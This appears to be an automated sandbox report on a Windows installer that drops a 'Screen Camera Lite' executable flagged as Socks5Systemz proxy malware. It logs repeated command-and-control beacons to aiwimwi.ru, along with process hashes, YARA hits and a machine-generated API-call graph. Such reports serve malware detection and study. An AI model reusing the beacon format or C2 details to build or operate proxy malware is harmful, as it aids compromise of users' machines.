                                                            Oct 7, 2024 03:42:54.827805996 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:55.515415907 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            61192.168.2.450066185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:55.638679028 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:56.350989103 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Oct 7, 2024 03:42:56.460820913 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:56.697432041 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            62192.168.2.450067185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:56.825587034 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:57.534832954 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            63192.168.2.450068185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:57.654122114 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:58.352068901 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            64192.168.2.450069185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:58.466001034 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:42:59.284970999 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            65192.168.2.450070185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:42:59.404062033 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:00.084494114 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:42:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            66192.168.2.450071185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:43:00.215811014 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:00.913203955 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:43:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            67192.168.2.450072185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:43:01.029913902 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:01.715522051 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:43:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            68192.168.2.450073185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:43:01.842722893 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:02.554652929 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:43:02 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            69192.168.2.450074185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:43:02.725037098 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:03.413173914 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:43:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            70192.168.2.450075185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:43:03.540199041 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:04.234046936 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:43:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            71192.168.2.450076185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:43:04.359433889 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:05.058903933 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:43:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            72192.168.2.450077185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:43:05.187531948 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:05.915679932 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:43:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            73192.168.2.450078185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:43:06.033303022 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:06.740071058 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:43:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            74192.168.2.450079185.208.158.248807088C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 7, 2024 03:43:06.875453949 CEST325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1
                                                            Host: aiwimwi.ru
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Oct 7, 2024 03:43:07.572369099 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Mon, 07 Oct 2024 01:43:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:21:41:01
                                                            Start date:06/10/2024
                                                            Path:C:\Users\user\Desktop\AyiNxJ98mL.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\AyiNxJ98mL.exe"
                                                            Imagebase:0x400000
                                                            File size:5'031'933 bytes
                                                            MD5 hash:1D579066D7524921E14164EA1E9A9807
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:1
                                                            Start time:21:41:01
                                                            Start date:06/10/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp" /SL5="$20424,4742621,54272,C:\Users\user\Desktop\AyiNxJ98mL.exe"
                                                            Imagebase:0x400000
                                                            File size:709'120 bytes
                                                            MD5 hash:16C9D19AB32C18671706CEFEE19B6949
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:21:41:03
                                                            Start date:06/10/2024
                                                            Path:C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exe" -i
                                                            Imagebase:0x400000
                                                            File size:3'532'800 bytes
                                                            MD5 hash:9773013A29C2D339FD5258A117195F58
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.2965500570.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:21%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:2.4%
                                                              Total number of Nodes:1498
                                                              Total number of Limit Nodes:22
                                                              execution_graph 4983 409c40 5024 4030dc 4983->5024 4985 409c56 5027 4042e8 4985->5027 4987 409c5b 5030 40457c GetModuleHandleA GetProcAddress 4987->5030 4993 409c6a 5047 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4993->5047 5010 409d43 5109 4074a0 5010->5109 5012 409d05 5012->5010 5142 409aa0 5012->5142 5013 409d84 5113 407a28 5013->5113 5014 409d69 5014->5013 5015 409aa0 4 API calls 5014->5015 5015->5013 5017 409da9 5123 408b08 5017->5123 5021 409def 5022 408b08 21 API calls 5021->5022 5023 409e28 5021->5023 5022->5021 5152 403094 5024->5152 5026 4030e1 GetModuleHandleA GetCommandLineA 5026->4985 5029 404323 5027->5029 5153 403154 5027->5153 5029->4987 5031 404598 5030->5031 5032 40459f GetProcAddress 5030->5032 5031->5032 5033 4045b5 GetProcAddress 5032->5033 5034 4045ae 5032->5034 5035 4045c4 SetProcessDEPPolicy 5033->5035 5036 4045c8 5033->5036 5034->5033 5035->5036 5037 4065b8 5036->5037 5166 405c98 5037->5166 5046 406604 6F551CD0 5046->4993 5048 4090f7 5047->5048 5293 406fa0 SetErrorMode 5048->5293 5053 403198 4 API calls 5054 40913c 5053->5054 5055 409b30 GetSystemInfo VirtualQuery 5054->5055 5056 409be4 5055->5056 5059 409b5a 5055->5059 5061 409768 5056->5061 5057 409bc5 VirtualQuery 5057->5056 5057->5059 5058 409b84 VirtualProtect 5058->5059 5059->5056 5059->5057 5059->5058 5060 409bb3 VirtualProtect 5059->5060 5060->5057 5303 406bd0 GetCommandLineA 5061->5303 5063 409825 5065 4031b8 4 API calls 5063->5065 5064 406c2c 6 API calls 5068 409785 5064->5068 5066 40983f 5065->5066 5069 406c2c 5066->5069 5067 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5067->5068 5068->5063 5068->5064 5068->5067 5070 406c53 GetModuleFileNameA 5069->5070 5071 406c77 GetCommandLineA 5069->5071 5072 403278 4 API calls 5070->5072 5079 406c7c 5071->5079 5073 406c75 5072->5073 5076 406ca4 5073->5076 5074 406c81 5077 403198 4 API calls 5074->5077 5075 406af0 4 API calls 5075->5079 5080 403198 4 API calls 5076->5080 5078 406c89 5077->5078 5081 40322c 4 API calls 5078->5081 5079->5074 5079->5075 5079->5078 5082 406cb9 5080->5082 5081->5076 5083 4031e8 5082->5083 5084 4031ec 5083->5084 5085 4031fc 5083->5085 5084->5085 5087 403254 4 API calls 5084->5087 5086 403228 5085->5086 5088 4025ac 4 API calls 5085->5088 5089 4074e0 5086->5089 5087->5085 5088->5086 5090 4074ea 5089->5090 5324 407576 5090->5324 5327 407578 5090->5327 5091 407516 5092 40752a 5091->5092 5330 40748c GetLastError 5091->5330 5096 409bec FindResourceA 5092->5096 5097 409c01 5096->5097 5098 409c06 SizeofResource 5096->5098 5099 409aa0 4 API calls 5097->5099 5100 409c13 5098->5100 5101 409c18 LoadResource 5098->5101 5099->5098 5102 409aa0 4 API calls 5100->5102 5103 409c26 5101->5103 5104 409c2b LockResource 5101->5104 5102->5101 5105 409aa0 4 API calls 5103->5105 5106 409c37 5104->5106 5107 409c3c 5104->5107 5105->5104 5108 409aa0 4 API calls 5106->5108 5107->5012 5139 407918 5107->5139 5108->5107 5110 4074b4 5109->5110 5111 4074c4 5110->5111 5112 4073ec 20 API calls 5110->5112 5111->5014 5112->5111 5114 407a35 5113->5114 5115 405880 4 API calls 5114->5115 5116 407a89 5114->5116 5115->5116 5117 407918 InterlockedExchange 5116->5117 5118 407a9b 5117->5118 5119 405880 4 API calls 5118->5119 5120 407ab1 5118->5120 5119->5120 5121 405880 4 API calls 5120->5121 5122 407af4 5120->5122 5121->5122 5122->5017 5127 408b82 5123->5127 5136 408b39 5123->5136 5124 408bcd 5438 407cb8 5124->5438 5126 408be4 5130 4031b8 4 API calls 5126->5130 5127->5124 5129 4034f0 4 API calls 5127->5129 5134 403420 4 API calls 5127->5134 5135 4031e8 4 API calls 5127->5135 5138 407cb8 21 API calls 5127->5138 5129->5127 5132 408bfe 5130->5132 5131 4031e8 4 API calls 5131->5136 5149 404c10 5132->5149 5133 403420 4 API calls 5133->5136 5134->5127 5135->5127 5136->5127 5136->5131 5136->5133 5137 407cb8 21 API calls 5136->5137 5429 4034f0 5136->5429 5137->5136 5138->5127 5464 4078c4 5139->5464 5143 409ac1 5142->5143 5144 409aa9 5142->5144 5145 405880 4 API calls 5143->5145 5146 405880 4 API calls 5144->5146 5148 409ad2 5145->5148 5147 409abb 5146->5147 5147->5010 5148->5010 5150 402594 4 API calls 5149->5150 5151 404c1b 5150->5151 5151->5021 5152->5026 5154 403164 5153->5154 5155 40318c TlsGetValue 5153->5155 5154->5029 5156 403196 5155->5156 5157 40316f 5155->5157 5156->5029 5161 40310c 5157->5161 5159 403174 TlsGetValue 5160 403184 5159->5160 5160->5029 5162 403120 LocalAlloc 5161->5162 5163 403116 5161->5163 5164 40313e TlsSetValue 5162->5164 5165 403132 5162->5165 5163->5162 5164->5165 5165->5159 5238 405930 5166->5238 5169 405270 GetSystemDefaultLCID 5172 4052a6 5169->5172 5170 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5170->5172 5171 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5171->5172 5172->5170 5172->5171 5173 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5172->5173 5174 405308 5172->5174 5173->5172 5175 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5174->5175 5176 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5174->5176 5177 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5174->5177 5178 40538b 5174->5178 5175->5174 5176->5174 5177->5174 5271 4031b8 5178->5271 5181 4053b4 GetSystemDefaultLCID 5275 4051fc GetLocaleInfoA 5181->5275 5184 4031e8 4 API calls 5185 4053f4 5184->5185 5186 4051fc 5 API calls 5185->5186 5187 405409 5186->5187 5188 4051fc 5 API calls 5187->5188 5189 40542d 5188->5189 5281 405248 GetLocaleInfoA 5189->5281 5192 405248 GetLocaleInfoA 5193 40545d 5192->5193 5194 4051fc 5 API calls 5193->5194 5195 405477 5194->5195 5196 405248 GetLocaleInfoA 5195->5196 5197 405494 5196->5197 5198 4051fc 5 API calls 5197->5198 5199 4054ae 5198->5199 5200 4031e8 4 API calls 5199->5200 5201 4054bb 5200->5201 5202 4051fc 5 API calls 5201->5202 5203 4054d0 5202->5203 5204 4031e8 4 API calls 5203->5204 5205 4054dd 5204->5205 5206 405248 GetLocaleInfoA 5205->5206 5207 4054eb 5206->5207 5208 4051fc 5 API calls 5207->5208 5209 405505 5208->5209 5210 4031e8 4 API calls 5209->5210 5211 405512 5210->5211 5212 4051fc 5 API calls 5211->5212 5213 405527 5212->5213 5214 4031e8 4 API calls 5213->5214 5215 405534 5214->5215 5216 4051fc 5 API calls 5215->5216 5217 405549 5216->5217 5218 405566 5217->5218 5219 405557 5217->5219 5221 40322c 4 API calls 5218->5221 5289 40322c 5219->5289 5222 405564 5221->5222 5223 4051fc 5 API calls 5222->5223 5224 405588 5223->5224 5225 4055a5 5224->5225 5226 405596 5224->5226 5227 403198 4 API calls 5225->5227 5228 40322c 4 API calls 5226->5228 5229 4055a3 5227->5229 5228->5229 5283 4033b4 5229->5283 5231 4055c7 5232 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5231->5232 5233 4055e1 5232->5233 5234 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5233->5234 5235 4055fb 5234->5235 5236 405ce4 GetVersionExA 5235->5236 5237 405cfb 5236->5237 5237->5046 5239 40593c 5238->5239 5246 404ccc LoadStringA 5239->5246 5242 4031e8 4 API calls 5243 40596d 5242->5243 5249 403198 5243->5249 5253 403278 5246->5253 5250 4031b7 5249->5250 5251 40319e 5249->5251 5250->5169 5251->5250 5267 4025ac 5251->5267 5258 403254 5253->5258 5255 403288 5256 403198 4 API calls 5255->5256 5257 4032a0 5256->5257 5257->5242 5259 403274 5258->5259 5260 403258 5258->5260 5259->5255 